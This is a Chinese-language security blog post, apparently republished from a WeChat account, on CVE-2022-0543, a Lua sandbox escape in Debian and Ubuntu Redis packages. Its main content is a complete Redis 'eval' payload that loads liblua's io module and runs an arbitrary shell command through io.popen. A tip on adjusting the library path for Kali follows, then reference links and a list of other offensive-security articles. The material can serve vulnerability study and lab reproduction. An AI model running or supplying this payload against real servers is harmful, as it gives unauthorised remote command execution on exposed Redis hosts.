Redis Lua沙盒绕过命令执行（CVE-2022-0543）

2022年3月17日03:41:35评论104 views字数 631阅读2分6秒阅读模式

Debian以及Ubuntu发行版的源在打包Redis时，不慎在Lua沙箱中遗留了一个对象package，攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数，进而逃逸沙箱执行任意命令。

Payload：

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("uname -a", "r"); local res = f:read("*a"); f:close(); return res' 0

Redis Lua沙盒绕过命令执行（CVE-2022-0543）

值得注意的是，不同环境下的liblua库路径不同，你需要指定一个正确的路径。在Kali中，这个路径是/usr/lib/x86_64-linux-gnu/liblua5.1.so.0。

Redis Lua沙盒绕过命令执行（CVE-2022-0543）

参考链接：

#Vulhub Redis Lua Sandbox Escape && RCE (CVE-2022-0543)
Awesome vulnerability, without any binary technique, just one Redis command.
So how to reproduce the vulnerability: https://t.co/rw6ocye1N2
Original vulnerability reference: https://t.co/Dt340JSelA pic.twitter.com/jL9MDjT4EN

— Phith0n (@phithon_xg) March 10, 2022
https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
https://github.com/vulhub/vulhub/blob/master/redis/CVE-2022-0543/README.zh-cn.md

原文始发于微信公众号（backdoor）：Redis Lua沙盒绕过命令执行（CVE-2022-0543）

左青龙
微信扫一扫

右白虎
微信扫一扫

Redis Lua沙盒绕过命令执行（CVE-2022-0543）

2024护网经验学习（一）

API未授权访问到进入系统

Hack The Box——Perfection笔记

漏洞检查表 :vulnerability-Checklist

前端Js解密小技巧|JS逆向

DarkGPT：基于GPT-4对泄露的数据库执行查询的AI助手

在Windows 11 上红队使用 PE进行AV 规避

网络安全扫盲篇名词解释之挖矿

Linux 网络 ELI5 — 第 2 部分，IP、NAT 和 DHCP

攻防演练中如何利用Hook绕过EDR的内存保护

发表评论

在线咨询

微信